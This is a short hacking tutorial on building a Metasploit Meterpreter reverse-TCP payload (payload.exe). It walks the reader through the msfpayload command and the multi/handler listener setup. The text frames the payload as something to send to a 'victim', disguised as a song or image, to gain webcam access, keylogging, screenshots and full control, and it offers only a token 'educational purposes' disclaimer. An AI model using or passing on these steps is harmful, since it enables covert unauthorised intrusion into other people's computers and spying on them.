Tutorial: How to create a Meterpreter using Metasploit for creating backdoors on target PC
Okay so today I’m going to show you guys how to create a payload using Metasploit which can be used for creating backdoors on a target machine. What we are going to do here is that we are gonna create a payload.exe file which you’ll be sending to your victim either directly or by hiding it in some program like either a song or an image etc. Once your victim runs that program hiding the payload file or the payload file itself, you can do some pretty amazing stuff like taking screenshots, taking pictures through webcam, recording the keystrokes, accessing root privileges and completely owning the target machine as if your’s. Let’s get started now. I’m assuming that you’re running Metasploit on Kali Linux but you can get it for other linux distros and Windows too.
Fire up the terminal in Kali linux machine and type :
msfpayload windows/meterpreter/reverse_tcp LHOST=(here goes your IP address) LPORT=(any port you may like or use 4444) X > payload.exe
above command is gonna create a payload.exe file which you can access from your home folder. This is the file that you have to send to your victim and have to make him click on this, once he does it, you can exploit the server using Metasploit. To start the exploit, open up a new terminal and type :
msfconsole
this is gonna take some time depending upon your PC. Once Metasploit loads, type :
use exploit/multi/handler/
set LHOST “your IP address”
set LPORT “port that you’ve used while creating the payload file”
show options
exploit
set LHOST “your IP address”
set LPORT “port that you’ve used while creating the payload file”
show options
exploit
and now, the server that we have is running and we have the session open.
IMPORTANT-For you to start listening to the server, it is important that the victim have run the payload.exe file and should have a internet connection going on.
At this poinit you can do many things like gathering the victim’s system information by typing sysinfo or else you can type help to get a list of different operations which you can perform.
So, by this we have came to the end of this tutorial. As always, this tutorial is for only educational purposes, you and only you are to be held responsible for the consequences. Leave comments below if you have any further query or suggestions. 